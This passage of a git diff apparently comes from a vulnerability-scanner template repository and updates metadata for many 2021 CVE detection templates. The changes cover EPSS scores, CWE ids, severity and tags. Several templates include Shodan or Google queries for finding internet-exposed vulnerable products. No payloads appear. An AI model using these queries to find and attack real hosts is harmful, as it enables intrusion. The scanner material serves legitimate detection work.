1 vendor: lanproxy_project diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 4b14a8d203..61b3823c5b 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* + epss-percentile: 0.40466 metadata: max-request: 1 vendor: eng diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 4aff498f8e..bb8f18d7e3 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30461 cwe-id: CWE-94 - epss-score: 0.9675 + epss-score: 0.96767 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* + epss-percentile: 0.99521 metadata: max-request: 1 shodan-query: http.title:"VoIPmonitor" diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 47022a7d7e..8f0c78626a 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.96366 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* + epss-percentile: 0.99355 metadata: max-request: 1 framework: windows diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 5cb7d576eb..15ea343ebc 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3110 cwe-id: CWE-89 - epss-score: 0.95326 + epss-score: 0.95398 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* + epss-percentile: 0.99094 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 21cae88c6b..d5ae4e0b82 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -3,7 +3,7 @@ id: CVE-2021-31195 info: name: Microsoft Exchange Server - Cross-Site Scripting author: infosecsanyam - severity: high + severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. reference: - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html @@ -11,12 +11,13 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-31195 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 - epss-score: 0.96 + epss-score: 0.94276 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* + epss-percentile: 0.98858 metadata: max-request: 1 shodan-query: http.title:"Outlook" diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index 18d1460cb1..0040436a43 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -14,8 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2021-31249 - epss-score: 0.0042 + cwe-id: CWE-74 + epss-score: 0.00331 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.67395 metadata: max-request: 1 vendor: chiyu-tech diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 7d028abc95..702e6dc450 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.97079 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99662 metadata: max-request: 1 vendor: chiyu-tech diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index c7ff2e8ec7..76857ad1ad 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - epss-score: 0.97465 + epss-score: 0.97515 cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* + epss-percentile: 0.99973 metadata: max-request: 6 framework: laravel diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 8725161fbe..2e44115220 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00271 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* + epss-percentile: 0.63726 metadata: max-request: 1 vendor: sisinformatik diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 70ba023b4c..b5ec1abb7b 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.4 cve-id: CVE-2021-31581 - cwe-id: CWE-312,CWE-269 + cwe-id: CWE-269,CWE-312 epss-score: 0.00285 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* + epss-percentile: 0.64676 metadata: max-request: 1 vendor: akkadianlabs diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index d27a699f00..6c6c132874 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31589 cwe-id: CWE-79 - epss-score: 0.00215 + epss-score: 0.00287 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* + epss-percentile: 0.64804 metadata: max-request: 1 google-query: '"BeyondTrust" "Redistribution Prohibited"' diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 1031697a8f..b66d075deb 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-287 epss-score: 0.39689 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* + epss-percentile: 0.96761 metadata: max-request: 2 shodan-query: Pentaho diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index c06cf64fdd..6c057f5609 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00265 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* + epss-percentile: 0.63395 metadata: max-request: 1 shodan-query: html:"/_common/lvl5/dologin.jsp" diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index fee64ec37e..5f9886eaa9 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-787 epss-score: 0.96795 cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99535 metadata: max-request: 1 vendor: tenda diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index ea27db2778..7f6c01f134 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31805 cwe-id: CWE-917 - epss-score: 0.02 + epss-score: 0.03276 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.90017 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index f4cfc0ffb0..d58474bf46 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.05376 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* + epss-percentile: 0.92134 metadata: max-request: 1 vendor: layer5 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index eb9ae6141e..609e5ef4dc 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31862 cwe-id: CWE-79 - epss-score: 0.00145 + epss-score: 0.00141 cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* + epss-percentile: 0.49175 metadata: max-request: 1 vendor: sysaid diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index c911d7c7ac..d31c4af2a7 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32030 cwe-id: CWE-287 - epss-score: 0.68002 + epss-score: 0.66309 cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.97479 metadata: max-request: 1 vendor: asus diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 58a40f044a..403fb125d3 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32172 cwe-id: CWE-862 - epss-score: 0.13569 + epss-score: 0.20372 cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* + epss-percentile: 0.95712 metadata: max-request: 3 vendor: maianscriptworld diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index a499694f6e..c9ec7fc560 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.15641 cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* + epss-percentile: 0.95204 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 237ca45da4..8fccd19266 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - epss-score: 0.97295 + epss-score: 0.96929 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* + epss-percentile: 0.99602 metadata: max-request: 1 vendor: websvn diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index f1ff630626..99aa21b7bb 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00104 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* + epss-percentile: 0.41813 metadata: max-request: 1 vendor: flask-security_project diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index aaae3da036..b264baa3cb 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 - epss-score: 0.96875 + epss-score: 0.96678 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* + epss-percentile: 0.99486 metadata: max-request: 9 github: https://github.com/Studio-42/elFinder diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index dedf43242f..f53d1a947f 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - epss-score: 0.10789 + epss-score: 0.0942 cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93944 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 76aad330f6..f83dc63d6d 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.89034 + epss-score: 0.886 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* + epss-percentile: 0.98273 metadata: max-request: 1 vendor: squirrelly diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 28552bf384..9b91b033e2 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-32820 - cwe-id: CWE-94,CWE-200 + cwe-id: CWE-200,CWE-94 epss-score: 0.00929 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* + epss-percentile: 0.80999 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 62938be4ac..d089707d39 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.6 cve-id: CVE-2021-32853 cwe-id: CWE-79 - epss-score: 0.0066 + epss-score: 0.0045 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* + epss-percentile: 0.71943 metadata: max-request: 1 shodan-query: http.title:"erxes" diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index c4680c512b..ff0d4ff44c 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00226 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* + epss-percentile: 0.60142 metadata: max-request: 1 vendor: emlog diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 1a98f4451e..6dfaa8a293 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-287 epss-score: 0.18886 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* + epss-percentile: 0.95572 metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 520a89d8cb..06607abbdd 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.12129 + epss-score: 0.10344 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.94217 metadata: max-request: 1 vendor: dahuasecurity diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index a9b055684f..07ad1480f1 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306 epss-score: 0.24628 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* + epss-percentile: 0.96022 metadata: max-request: 1 vendor: commscope diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index e0abd235dc..140abdc762 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 - epss-score: 0.96446 + epss-score: 0.96752 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* + epss-percentile: 0.99515 metadata: max-request: 1 vendor: raspap diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 20a4f3de11..2298b4e4f7 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-33544 cwe-id: CWE-78 - epss-score: 0.97539 + epss-score: 0.97529 cpe: cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99982 metadata: max-request: 1 vendor: geutebrueck diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index ce74e25f95..ee6289f866 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33564 cwe-id: CWE-88 - epss-score: 0.07974 + epss-score: 0.07998 cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* + epss-percentile: 0.9344 metadata: max-request: 2 framework: ruby diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index f0e514be8e..4034cb40ab 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00195 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* + epss-percentile: 0.5653 metadata: max-request: 2 vendor: rstudio diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index c993c1bdb6..8c3e81057f 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* + epss-percentile: 0.44596 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index aedb184a50..7b33c9d1d0 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 - epss-score: 0.18588 + epss-score: 0.18908 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* + epss-percentile: 0.95576 metadata: max-request: 2 vendor: fortilogger diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index da3a4c6693..9f42411e15 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 - epss-score: 0.03105 + epss-score: 0.02433 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* + epss-percentile: 0.88585 metadata: max-request: 1 vendor: gespage diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index d36785e164..908be88e38 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00092 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* + epss-percentile: 0.3834 metadata: max-request: 4 verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 8fc4ee4f06..fca48061b4 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00152 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* + epss-percentile: 0.5076 metadata: max-request: 1 vendor: accela diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index fb588ce973..7bba239ebc 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00183 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* + epss-percentile: 0.54871 metadata: max-request: 1 vendor: accela diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 3eac460423..c3f2239732 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-34429 cwe-id: CWE-200 - epss-score: 0.82695 + epss-score: 0.79921 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* + epss-percentile: 0.97877 metadata: max-request: 2 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index b503e4fcc4..74161e0185 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-34473 cwe-id: CWE-918 - epss-score: 0.97442 + epss-score: 0.97443 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* + epss-percentile: 0.99916 metadata: max-request: 2 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 0a08c91be5..0c60b8728d 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306,CWE-269 epss-score: 0.79769 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97869 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 0f3056f195..994841813e 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index b9220c2a42..d6e66e046a 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 8aca78f9ef..c7b8f385d1 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-34805 cwe-id: CWE-22 - epss-score: 0.02368 + epss-score: 0.01996 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* + epss-percentile: 0.87368 metadata: max-request: 1 vendor: land-software diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 4c2109906e..2e287ef617 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -17,9 +17,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35250 - cwe-id: CWE-22,CWE-538 - epss-score: 0.04209 + cwe-id: CWE-22 + epss-score: 0.04866 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* + epss-percentile: 0.91736 metadata: max-request: 1 shodan-query: product:"Rhinosoft Serv-U httpd" diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index d124ab6725..c944fb215e 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.46567 metadata: max-request: 2 shodan-query: html:'content="MaxSite CMS' @@ -52,4 +53,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 2e14d1b6ed..be0104ede0 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-1188 epss-score: 0.08033 cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.93455 metadata: max-request: 1 vendor: tieline diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index d4f5c726da..10b5ccbe00 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - epss-score: 0.10594 + epss-score: 0.16223 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* + epss-percentile: 0.95287 metadata: max-request: 1 vendor: solari diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 6131f3cd93..43a1ce6e87 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35464 cwe-id: CWE-502 - epss-score: 0.97409 + epss-score: 0.97364 cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* + epss-percentile: 0.99844 metadata: max-request: 1 shodan-query: http.title:"OpenAM" vendor: forgerock product: am - tags: cve,cve2021,openam,rce,java,kev,kev,packetstorm + tags: packetstorm,cve,cve2021,openam,rce,java,kev http: - method: GET diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index b5395b6544..60d9fc7cb3 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* + epss-percentile: 0.49646 metadata: max-request: 1 shodan-query: http.html:"Thruk" diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 70adc3a2f7..481c104598 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35587 cwe-id: CWE-502 - epss-score: 0.96928 + epss-score: 0.96868 cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.99568 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-3577.yaml 